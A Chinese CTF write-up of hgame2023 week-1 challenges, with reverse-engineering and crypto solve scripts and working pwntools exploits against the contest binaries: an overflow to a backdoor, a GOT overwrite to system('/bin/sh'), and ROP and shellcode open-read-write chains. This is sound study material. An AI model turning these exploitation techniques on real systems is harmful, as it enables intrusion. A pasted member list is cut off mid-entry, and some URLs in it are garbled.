#WEEK1
文章目录
-
- RE
-
- 1、re-test_your_IDA
- 2、re-easyasm
- 3、re-easyenc
- 4、re-a_cup_of_tea
- 5、re-encode
- pwn
-
- 1、test_nc
- 2、easy_overflow
- 3、choose_the_seat
- 4、orw
- 5、simple_shellcode
- crypto
-
- 1、兔兔的车票
- 2、cr-RSA
- 3、Be Stream
- 4、神秘的电话
- web
-
- 1、Classic Childhood Game
- 2、Guess Who am I
- 3、Show Me Your Beauty
- 4、Become A Member
- misc
-
- 1、Sign In
- 2、e99p1ant_want_girlfriend
- 3、神秘的海报
- 4、Where am I
- BlockChain
-
- 1、Checkin
- Iot
-
- 1、Help the uncle who can't jump twice
- 2、Help marvin
RE
1、re-test_your_IDA
ida打开可见flag:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char Str1[24]; // [rsp+20h] [rbp-18h] BYREF
sub_140001064("%10s");
if ( !strcmp(Str1, "r3ver5e") )
sub_140001010("your flag:hgame{te5t_y0ur_IDA}");
return 0;
}
flag:hgame{te5t_y0ur_IDA}
2、re-easyasm
; void __cdecl enc(char *p)
.text:00401160 _enc proc near ; CODE XREF: _main+1B↑p
.text:00401160
.text:00401160 i = dword ptr -4
.text:00401160 Str = dword ptr 8
.text:00401160
.text:00401160 push ebp
.text:00401161 mov ebp, esp
.text:00401163 push ecx
.text:00401164 mov [ebp+i], 0
.text:0040116B jmp short loc_401176
.text:0040116D ; ---------------------------------------------------------------------------
.text:0040116D
.text:0040116D loc_40116D: ; CODE XREF: _enc+3B↓j
.text:0040116D mov eax, [ebp+i]
.text:00401170 add eax, 1
.text:00401173 mov [ebp+i], eax
.text:00401176
.text:00401176 loc_401176: ; CODE XREF: _enc+B↑j
.text:00401176 mov ecx, [ebp+Str]
.text:00401179 push ecx ; Str
.text:0040117A call _strlen
.text:0040117F add esp, 4
.text:00401182 cmp [ebp+i], eax
.text:00401185 jge short loc_40119D
.text:00401187 mov edx, [ebp+Str]
.text:0040118A add edx, [ebp+i]
.text:0040118D movsx eax, byte ptr [edx]
.text:00401190 xor eax, 33h ;异或0x33
.text:00401193 mov ecx, [ebp+Str]
.text:00401196 add ecx, [ebp+i]
.text:00401199 mov [ecx], al
.text:0040119B jmp short loc_40116D
.text:0040119D ; ---------------------------------------------------------------------------
.text:0040119D
.text:0040119D loc_40119D: ; CODE XREF: _enc+25↑j
.text:0040119D mov esp, ebp
.text:0040119F pop ebp
.text:004011A0 retn
.text:004011A0 _enc endp
Input: your flag
Encrypted result: 0x5b,0x54,0x52,0x5e,0x56,0x48,0x44,0x56,0x5f,0x50,0x3,0x5e,0x56,0x6c,0x47,0x3,0x6c,0x41,0x56,0x6c,0x44,0x5c,0x41,0x2,0x57,0x12,0x4e
分析处理逻辑就是个循环异或了0x33
exp:
c=[0x5b,0x54,0x52,0x5e,0x56,0x48,0x44,0x56,0x5f,0x50,0x3,0x5e,0x56,0x6c,0x47,0x3,0x6c,0x41,0x56,0x6c,0x44,0x5c,0x41,0x2,0x57,0x12,0x4e]
for i in range(len(c)):
a=c[i] ^0x33
print(chr(a),end='')
得到flag:hgame{welc0me_t0_re_wor1d!}
3、re-easyenc
ida分析代码
if ( v4 == 41 ) //flag长度 41
{
while ( 1 )
{
v5 = (flag[i] ^ 0x32) - 86; //逆向这段代码就行了
flag[i] = v5;
if ( *((_BYTE *)v8 + i) != v5 ) //对比密文
break;
if ( ++i >= 41 )
{
v6 = "you are right!";
goto LABEL_8;
}
}
...
动态调试获取到密文v5,然后exp:
c=[4, 255, 253, 9, 1, 243, 176, 0, 0, 5, 240, 173, 7, 6, 23, 5, 235, 23, 253, 23, 234, 1, 238, 1, 234, 177, 5, 250, 8, 1, 23, 172, 236, 1, 234, 253, 240, 5, 7, 6, 249]
for i in c:
i += 86
i&=0xff
i ^= 0x32
print(chr(i),end='')
得到flag:hgame{4ddit1on_is_a_rever5ible_0peration}
4、re-a_cup_of_tea
看题目应该是个tea算法,
ida:
Buf2[0] = 778273437;
Buf2[1] = -1051836401;
v11 = 0;
memset(Buf1, 0, sizeof(Buf1));
Buf2[2] = 1934188352;
Buf2[3] = 1985950815;
Buf2[4] = 1601794661;
Buf2[5] = 1818309480;
Buf2[6] = 1601792116;
Buf2[7] = 1848734308;
v9 = 1899;
sub_140001010("nice tea!\n> ");
sub_140001064("%50s");
v3 = 0;
v4 = 0;
v5 = 0;
v6 = 32i64;
do
{
v4 -= 0x543210DD;
v3 += (v4 + v5) ^ (16 * v5 + 305419896) ^ ((v5 >> 5) + 591751049);
v5 += (v4 + v3) ^ ((v3 >> 5) + 1164413185) ^ (16 * (v3 + 54880137));
--v6;
}
while ( v6 );
*(_QWORD *)&Buf1[0] = __PAIR64__(v5, v3);
if ( !memcmp(Buf1, Buf2, 0x22ui64) )
sub_140001010("wrong...");
sub_140001010("Congratulations!");
return 0
明文前两个int做了个tea,后面的内容没变,注意sum是int
exp:
from ctypes import *
from libnum import n2s
def tea_dec(v):
y = c_uint32(v[0])
z = c_uint32(v[1])
sum = c_int32(0)
delta = 0x543210DD
n = 32
w = [0,0]
for _ in range(32):
sum.value -= delta
while(n>0):
z.value -= (sum.value + y.value ) ^ ((y.value >> 5) + 1164413185) ^ (16 * (y.value + 54880137))
y.value -= (sum.value + z.value ) ^ (16 * z.value + 305419896) ^ ((z.value >> 5) + 591751049)
sum.value += delta
n -= 1
w[0] = y.value
w[1] = z.value
return w
Buf2 = [0x2E63829D,0xC14E400F]
flag2=b'@_Is_4_very_h3althy_dr1nk'
m = tea_dec(Buf2)
flag =n2s(m[0])[::-1]+n2s(m[1])[::-1]+flag2
print(flag)
得到flag:hgame{Te@_Is_4_very_h3althy_dr1nk}
附件后来做了更新,更新后做了4轮加密,key和算法没有变化
exp:
from ctypes import *
from libnum import n2s
def tea_dec(v):
y = c_uint32(v[0])
z = c_uint32(v[1])
sum = c_int32(0)
delta = 0x543210DD
n = 32
w = [0,0]
for _ in range(32):
sum.value -= delta
while(n>0):
z.value -= (sum.value + y.value ) ^ ((y.value >> 5) + 1164413185) ^ (16 * (y.value + 54880137))
y.value -= (sum.value + z.value ) ^ (16 * z.value + 305419896) ^ ((z.value >> 5) + 591751049)
sum.value += delta
n -= 1
w[0] = y.value
w[1] = z.value
return w
Buf2 = [778273437, 3243130895, 2604253113, 1512016660, 1636330974, 1701168847, 2667990884, 594166774]
#flag2=b'@_Is_4_very_h3althy_dr1nk'
m = tea_dec(Buf2)
flag =n2s(m[0])[::-1]+n2s(m[1])[::-1]
m = tea_dec(Buf2[2:])
flag +=n2s(m[0])[::-1]+n2s(m[1])[::-1]
m = tea_dec(Buf2[4:])
flag +=n2s(m[0])[::-1]+n2s(m[1])[::-1]
m = tea_dec(Buf2[6:])
flag +=n2s(m[0])[::-1]+n2s(m[1])[::-1]
flag +=b'k}'
print(flag)
#hgame{Tea_15_4_v3ry_h3a1k}
flag:hgame{Tea_15_4_v3ry_h3a1k}
5、re-encode
ida:
scanf("%50s", v5);
for ( i = 0; i < 50; ++i )
{
v4[2 * i] = v5[i] & 0xF; //低位
v4[2 * i + 1] = (v5[i] >> 4) & 0xF; //高位
}
for ( j = 0; j < 100; ++j )
{
if ( v4[j] != enc[j] )
{
printf(Format, v4[0]); // wrong
return 0;
}
}
printf(aYesYouAreRight, v4[0]); // right
return 0;
就是8位字符转2个4位,
exp:
c=[8, 6, 7, 6, 1, 6, 13, 6, 5, 6, 11, 7, 5, 6, 14, 6, 3, 6, 15, 6, 4, 6, 5, 6, 15, 5, 9, 6, 3, 7, 15, 5, 5, 6, 1, 6, 3, 7, 9, 7, 15, 5, 6, 6, 15, 6, 2, 7, 15, 5, 1, 6, 15, 5, 2, 7, 5, 6, 6, 7, 5, 6, 2, 7, 3, 7, 5, 6, 15, 5, 5, 6, 14, 6, 7, 6, 9, 6, 14, 6, 5, 6, 5, 6, 2, 7, 13, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
for i in range(0,len(c),2):
t = c[i+1] << 4| c[i]
print(chr(t),end='')
得到flag:hgame{encode_is_easy_for_a_reverse_engineer}
pwn
1、test_nc
cat flag
2、easy_overflow
常规操作,只不过close(1)要注意,可以使用报错输出 或者 将1重定向到2。
#encoding=utf-8
from pwn import *
r = remote('week-1.hgame.lwsec',31915)
context.binary = '/mnt/d/ctf/ti/hgame2023/week1/pwn-easy_overflow/vuln'
#r = process(context.binary.path)
elf = context.binary
libc = elf.libc
backdoor=0x401176
off= 16
payload = b'a'*off+p64(0)+p64(backdoor)
r.sendline(payload)
r.sendline('flag 1>&2') #sh flag也可
r.interactive()
3、choose_the_seat
兔兔在买高铁票时想要选一个好座位。
有一个任意地址写漏洞
1、改exit got让程序重复运行
2、puts泄露libc
3、改exit got改为ogg 或者 改先sit0让seat为’/bin/sh\0’ 后改puts got改为system,然后 sit 0。
exp
#encoding=utf-8
from ctypes import *
from pwn import *
import time
context(os='linux',arch='amd64')
#context.arch = 'amd64'
#r = remote('week-1.hgame.lwsec',31086)
context.binary = '/mnt/d/ctf/ti/hgame2023/week1/pwn-choose_the_seat/vuln'
r = process(context.binary.path)
elf = context.binary
libc = elf.libc
def getn(addr):
x = (addr >> 4) | 0x80000000
y = c_int32(x)
return y.value
start=0x4010F0
x =getn(elf.got.exit-0x4040A0)
r.sendlineafter(b'choose one.\n',str(x).encode())
r.sendafter(b'your name\n',p64(start))
x =getn(0x404018-0x4040A0)
r.sendlineafter(b'choose one.\n',str(x).encode())
r.sendafter(b'your name\n',b"aaaaaaaa")
puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc.address = puts_addr - libc.symbols["puts"]
#采用ogg
'''
ogg = libc.address+0xe3b01
x =getn(elf.got.exit-0x4040A0)
print(x)
r.sendlineafter(b'choose one.\n',str(x).encode())
r.sendafter(b'your name\n',p64(ogg))
'''
####不用ogg
sys_addr=libc.symbols['system']
sh_addr=next(libc.search(b"/bin/sh\0"))
r.sendlineafter(b'choose one.\n',str(0).encode())
r.sendafter(b'your name\n',b'/bin/sh\0')
x =getn(0x404018-0x4040A0)
r.sendlineafter(b'choose one.\n',str(x).encode())
r.sendafter(b'your name\n',b"aaaaaaaa"+p64(sys_addr))
r.sendline(b'0')
r.interactive()
4、orw
泄露libc后因为溢出栈长度不足以构造三个参数的rop,所以进行栈迁移,然后构造flag字符串,orw
exp:
#encoding=utf-8
from pwn import *
import time
context(os='linux',arch='amd64')
#r = remote('week-1.hgame.lwsec',31815)
context.binary = '/mnt/d/ctf/ti/hgame2023/week1/pwn-orw/vuln'
r = process(context.binary.path)
elf = context.binary
libc = elf.libc
off=256
start_addr = 0x4010B0
poprdi_addr = 0x401393
leave_ret = 0x4012EE
bss = elf.bss()
print("bss:"+hex(bss))
payload = b'a'*off+p64(0)+p64(poprdi_addr)+p64(elf.got.puts)+p64(elf.plt.puts)+p64(start_addr)
r.sendlineafter(b'this task.\n',payload)
puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print("puts_addr:"+hex(puts_addr))
libc.address = puts_addr - libc.symbols["puts"]
open_addr=libc.symbols['open']
read_addr=libc.symbols['read']
write_addr=libc.symbols['write']
gets_addr=libc.symbols['gets']
poprsi_addr = libc.address + 0x2601f
poprdx_addr = libc.address + 0x142c92
#栈迁移
flag_addr = bss + 0x100
read_buf = bss + 0x100 + 0x10
newstack = bss + 0x200
print("flag_addr:"+hex(flag_addr))
print("newstack:"+hex(newstack))
payload = b'a'*off+p64(newstack)
payload += p64(poprdi_addr) + p64(newstack+8)+ p64(gets_addr)+p64(leave_ret)
print(len(payload))
r.sendlineafter(b'this task.\n',payload)
payload = p64(poprdi_addr)+ p64(flag_addr)+p64(gets_addr)
payload += p64(poprdi_addr)+ p64(flag_addr)+p64(poprsi_addr)+p64(0)+p64(open_addr)
payload += p64(poprdi_addr)+ p64(3)+p64(poprsi_addr)+ p64(read_buf)+p64(poprdx_addr)+p64(50)+p64(read_addr)
payload += p64(poprdi_addr)+ p64(1)+p64(poprsi_addr)+ p64(read_buf)+p64(poprdx_addr)+p64(50)+p64(write_addr)
r.sendline(payload)
r.sendline(b'flag\0')
r.interactive()
5、simple_shellcode
构造shellcode,并且开了限制智能orw,因为一开始构造的长度限制0x10,所以无法构造orw的shellcode,先构造个read,读入数据放到read执行完后的地址,然后利用read构造orw的shellcode
exp:
#encoding=utf-8
from pwn import *
import time
context(os='linux',arch='amd64')
r = remote('week-1.hgame.lwsec',31969)
context.binary = '/mnt/d/ctf/ti/hgame2023/week1/pwn-simple_shellcode/vuln'
#r = process(context.binary.path)
elf = context.binary
libc = elf.libc
code = '''
mov rsi, rdx #rdi buf
mov rdx, 0x100 #rdx len
xor rdi, rdi #
syscall
'''
code = asm(code)
print(len(code))
#gdb.attach(r,'b *$rebase(0x13B9)')
time.sleep(2)
r.sendline(code)
ad = 0xCAFE0000+0x100
shellcode = shellcraft.open("./flag")
shellcode += shellcraft.read(3, ad, 0x50)
shellcode += shellcraft.write(1, ad, 0x50)
payload = asm(shellcode)
print(len(code))
r.sendline(b"\x90"*len(code)+payload)
r.interactive()
crypto
1、兔兔的车票
兔兔刚买到车票就把车票丢到一旁,自己忙去了。结果再去找车票时发现原来的车票混在了其他东西里,而且票面还被污染了。你能帮兔兔找到它的车票吗。 注:flag.png已经提前保存在source文件夹下,并且命名为picture{x}.png
根据题目脚本,source下文件的大部分像素点为(0,0,0),可以假定为全(0,0,0),也就是明文已知,所以key = enc ^ source,flag = key^enckey
但是因为key有三个,所以需要爆破一下,查找 与flag图片使用同一key的enc:
exp:
from PIL import Image
from Crypto.Util.number import *
from random import shuffle, randint, getrandbits
flagImg = Image.open('pics/enc0.png')
width = flagImg.width
height = flagImg.height
def makeSourceImg():
colors = long_to_bytes(getrandbits(width * height * 24))[::-1]
img = Image.new('RGB', (width, height))
x = 0
for i in range(height):
for j in range(width):
img.putpixel((j, i), (colors[x], colors[x + 1], colors[x + 2]))
x += 3
return img
def makeSourceImg0():
colors =list(b''.zfill(width * height * 24))
shuffle(colors)
colors = bytes(colors)
img = Image.new('RGB', (width, height))
x = 0
for i in range(height):
for j in range(width):
img.putpixel((j, i), (colors[x], colors[x + 1], colors[x + 2]))
x += 3
return img
def xorImg(keyImg, sourceImg):
img = Image.new('RGB', (width, height))
for i in range(height):
for j in range(width):
p1, p2 = keyImg.getpixel((j, i)), sourceImg.getpixel((j, i))
img.putpixel((j, i), tuple([(p1[k] ^ p2[k]) for k in range(3)]))
return img
#source文件夹下面的图片生成过程:
def makeImg():
colors = list(long_to_bytes(getrandbits(width * height * 23)).zfill(width * height * 24))
shuffle(colors)
colors = bytes(colors)
img = Image.new('RGB', (width, height))
x = 0
for i in range(height):
for j in range(width):
img.putpixel((j, i), (colors[x], colors[x + 1], colors[x + 2]))
x += 3
return img
n = makeSourceImg0()
im = Image.open(f'pics/enc1.png') #0、2、3、4、5、6、7... 1的时候就遇到了
key = n
nImg = xorImg(key, im)
for i in range(16):
im = Image.open(f'pics/enc{i}.png')
decImg = xorImg(nImg, im)
decImg.save(f'pics/dec{i}.png')
得到flag:hgame{Oh_my_Ticket}
2、cr-RSA
n用factordb可分解
然后常规脚本:
import gmpy2
from Crypto.Util.number import long_to_bytes
e = 65537
c=110674792674017748243232351185896019660434718342001686906527789876264976328686134101972125493938434992787002915562500475480693297360867681000092725583284616353543422388489208114545007138606543678040798651836027433383282177081034151589935024292017207209056829250152219183518400364871109559825679273502274955582
n=135127138348299757374196447062640858416920350098320099993115949719051354213545596643216739555453946196078110834726375475981791223069451364024181952818056802089567064926510294124594174478123216516600368334763849206942942824711531334239106807454086389211139153023662266125937481669520771879355089997671125020789
p=11239134987804993586763559028187245057652550219515201768644770733869088185320740938450178816138394844329723311433549899499795775655921261664087997097294813
q=12022912661420941592569751731802639375088427463430162252113082619617837010913002515450223656942836378041122163833359097910935638423464006252814266959128953
d = gmpy2.invert(e,(p-1)*(q-1))
m=pow(c,d,n)
print(long_to_bytes(m))
flag:hgame{factordb_is_strong!}
3、Be Stream
很喜欢李小龙先生的一句话"Be water my friend",但是这条小溪的水好像太多了。
使用快速幂优化stream算法算法, sage脚本
key = [int.from_bytes(b"Be water", 'big'), int.from_bytes(b"my friend", 'big')]
print('key=',key)
enc=b'\x1a\x15\x05\t\x17\tu"-\x06lm\x01-\xc7\xcc2\x1eXA\x1c\x15\xb7\xdb\x06\x13\xaf\xa1-\x0b\xd4\x91-\x06\x8b\xd4-\x1e\xab\xaa\x15-\xf0\xed\x1f\x17\x1bY'
A = matrix(Zmod(256), [[4, 7], [1, 0]])
B = vector(Zmod(256), [key[1],key[0]])
def stream(i):
return int((A ^ (i) * B)[1])
flag=''
for i in range(len(enc)):
water = stream((i//2)**6) % 256
flag += chr(int(water ^^ enc[i]) & 0x7f)
print(flag)
flag:hgame{1f_this_ch@l|eng3_take_y0u_to0_long_time?}
后来尝试用chatgpt简化:
这个算法复杂度还是比较大,能解出来,但是比较慢。
4、神秘的电话
学校突然放假了,tr0uble正在开开心心的收拾东西准备回家,但是手机铃声突然响起,tr0uble接起电话,但是只听到滴答滴答的声音。努力学习密码学的tr0uble一听就知道这是什么,于是马上记录下来并花了亿点时间成功破译了,但是怎么看这都不像是人能看懂的,还没等tr0uble反应过来,又一通电话打来,依然是滴答滴答的声音。tr0uble想到兔兔也在学习密码学,于是不负责任地把密文都交给了兔兔,兔兔收到密文后随便看了一眼就不屑地说"这么简单都不会?自己解去,别耽误我抢车票"。 flag为最后得到的结果套上hgame{}, flag中字母均为小写
附件一个密文文本,一个wav文件,wav文件名morse.wav, 为摩斯密码,
打开后也像
手抄:
----- …— …— …-- . …–.- .–. .-. … … -… .-… -.-- …–.- …–.- … — -. .-- .- …–.- .— – --. … …–.- …-. --. -.- -.-. --.- .- — --.- - – …-. .-.
摩斯解码:0223e_priibly__honwa_jmgh_fgkcqaoqtmfr
文本做base64解码得到
几个星期前,我们收到一个神秘的消息。但是这个消息被重重加密,我们不知道它的真正含义是什么。唯一知道的信息是关于密钥的:“只有倒着翻过十八层的篱笆才能抵达北欧神话的终点”。
关键点:倒着、18层篱笆、北欧神话
1)倒着(取逆):
rfmtqoaqckgf_hgmj_awnoh__ylbiirp_e3220
2)18层篱笆(w形栅栏18 ):
rmocfhm_wo_ybipe2023_ril_hnajg_katfqqg
看到2023感觉步骤是对的
3)北欧神话(维吉尼亚:key:Vidar)
welcometohgameandenjoyhacking
北欧神话这个搞了很久,加密算法中没有找到跟北欧神话有关的,搜索北欧神话 ctf,找到的关键字是组织方的战队名“Vidar” 那这个可能是key,尝试之后发现是维吉尼亚密码。
4)补充上数字和下划线:
welcome_to_hgame2023_and_enjoy_hacking
flag:hgame{welcome_to_hgame2023_and_enjoy_hacking}
web
1、Classic Childhood Game
兔最近迷上了一个纯前端实现的网页小游戏,但是好像有点难玩,快帮兔兔通关游戏!
在Events.js中有个处理加密数据的函数mota(),在console中执行:
2、Guess Who am I
刚加入Vidar的兔兔还认不清协会成员诶,学长要求的答对100次问题可太难了,你能帮兔兔写个脚本答题吗?
打开页面后要求回答问题,查看源码有个hint:
打开hint链接是答案
exp:
ans=[
{
"id": "ba1van4",
"intro": "21级 / 不会Re / 不会美工 / 活在梦里 / 喜欢做不会的事情 / ◼◻粉",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=kSt5er0OQMXROy28nzTia0A&s=640",
"url": "https://ba1van4.icu"
},
{
"id": "yolande",
"intro": "21级 / 非常菜的密码手 / 很懒的摸鱼爱好者,有点呆,想学点别的但是一直开摆",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=rY328VIqDc7lNtujYic8JxA&s=640",
"url": "https://y01and3.github.io/"
},
{
"id": "t0hka",
"intro": "21级 / 日常自闭的Re手",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=EYNwm1PQe8o5OcghFb4zfw&s=640",
"url": "https://blog.t0hka./"
},
{
"id": "h4kuy4",
"intro": "21级 / 菜鸡pwn手 / 又菜又爱摆",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=BmACniaibVb6IL6LiaYF4Uvlw&s=640",
"url": "https://hakuya.work"
},
{
"id": "kabuto",
"intro": "21级web / cat../../../../f*",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=oPn2ez6Nq12GqPZG6cV7nw&s=640",
"url": "https://www.bilibili/video/BV1GJ411x7h7/"
},
{
"id": "R1esbyfe",
"intro": "21级 / 爱好歪脖 / 究极咸鱼一条 / 热爱幻想 / 喜欢窥屏水群",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=FLyUHP6nYov19gA0ia83u8Q&s=640",
"url": "https://r1esbyfe./"
},
{
"id": "tr0uble",
"intro": "21级 / 喜欢肝原神的密码手",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=bgcib3gBjJGdKEf7BZ512Uw&s=640",
"url": "https://clingm."
},
{
"id": "Roam",
"intro": "21级 / 入门级crypto",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=5wzr9TVyw2nxOz5Jb7ceaQ&s=640",
"url": "#"
},
{
"id": "Potat0",
"intro": "20级 / 摆烂网管 / DN42爱好者",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=NicTy1CDqeHsgzbZEIUU2wg&s=640",
"url": "https://potat0/"
},
{
"id": "Summer",
"intro": "20级 / 歪脖手 / 想学运维 / 发呆业务爱好者",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=4y6zxTBSB3cbseeyPvQWng&s=640",
"url": "https://blog.m1dsummer."
},
{
"id": "chuj",
"intro": "20级 / 已退休不再参与大多数赛事 / 不好好学习,生活中就会多出许多魔法和奇迹",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=aM4tJSQSxB5gcauIMDEtUg&s=640",
"url": "https://cjovi.icu"
},
{
"id": "4nsw3r",
"intro": "20级会长 / re / 不会pwn",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=j3LOiav9IluKSYg1VEibblZw&s=640",
"url": "https://4nsw3r./"
},
{
"id": "4ctue",
"intro": "20级 / 可能是IOT的MISC手 / 可能是美工 / 废物晚期",
"url": "#"
},
{
"id": "0wl",
"intro": "20级 / Re手 / 菜",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=06FRYslcuprt59OxibicdhqQ&s=640",
"url": "https://0wl-alt.github.io"
},
{
"id": "At0m",
"intro": "20级 / web / 想学iot",
"url": "https://homeboyc/"
},
{
"id": "ChenMoFeiJin",
"intro": "20级 / Crypto / 摸鱼学代师",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=5xyCaLib3lovjrUzf5pWxDQ&s=640",
"url": "https://chenmofeijin."
},
{
"id": "Klrin",
"intro": "20级 / WEB / 菜的抠脚 / 想学GO",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=nnzEWNwxMS88jKYre5fOjg&s=640",
"url": "https://blog.mjclouds/"
},
{
"id": "ek1ng",
"intro": "20级 / Web / 还在努力",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=pJFuHEqNaFk1If1STvRibWw&s=640",
"url": "https://ek1ng"
},
{
"id": "latt1ce",
"intro": "20级 / Crypto&BlockChain / Plz V me 50 eth",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=EmPiaz7Msgg7iaia9tibibjdUyw&s=640",
"url": "https://lee-tc.github.io/"
},
{
"id": "Ac4ae0",
"intro": "*级 / 被拐卖来接盘的格子 / 不可以乱涂乱画哦",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=EI7A02PYs5WUVFP2bciad8w&s=640",
"url": "https://twitter/LAttic1ng"
},
{
"id": "Akira",
"intro": "19级 / 不会web / 半吊子运维 / 今天您漏油了吗",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=ku1vqyI1hLJr61PGIlic7Ow&s=640",
"url": "https://4kr."
},
{
"id": "qz",
"intro": "19级 / 摸鱼美工 / 学习图形学、渲染ing",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=q5qVDcvyzxee4qiays52mibA&s=640",
"url": "https://fl0./"
},
{
"id": "Liki4",
"intro": "19级 / 脖子笔直歪脖手",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=E3j3BJrsAfyl1arfnFKufQ&s=640",
"url": "https://github/Liki4"
},
{
"id": "0x4qE",
"intro": "19级 / </p><p>Web",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=K7icYial1VVzlNl7hrD9MlNw&s=640",
"url": "https://github/0x4qE"
},
{
"id": "xi4oyu",
"intro": "19级 / 骨瘦如柴的胖手",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=JfeMY6Lz5ZU4GmtTV85otQ&s=640",
"url": "https://www.xi4oyu./"
},
{
"id": "R3n0",
"intro": "19级 / bin底层选手",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=icY08gnMlXtoYIJ9ib3eJQ2g&s=640",
"url": "https://r3n0."
},
{
"id": "m140",
"intro": "19级 / 不会re / dl萌新 / 太弱小了,没有力量 / 想学游戏",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=zt0iccbnGuV8dOpXIYrJgvg&s=640",
"url": "#"
},
{
"id": "Mezone",
"intro": "19级 / 普通的binary爱好者。",
"avatar": "https://thirdqq.qlogo/g?b=sdk&k=rDD29iahzzg8AvQX7fdbFPg&s=640",
"url": "#"
},
{
"id": "d1gg12",
"intro": "19级 / 游戏开发 /
更多推荐
hgame2023 week1 writeup
发布评论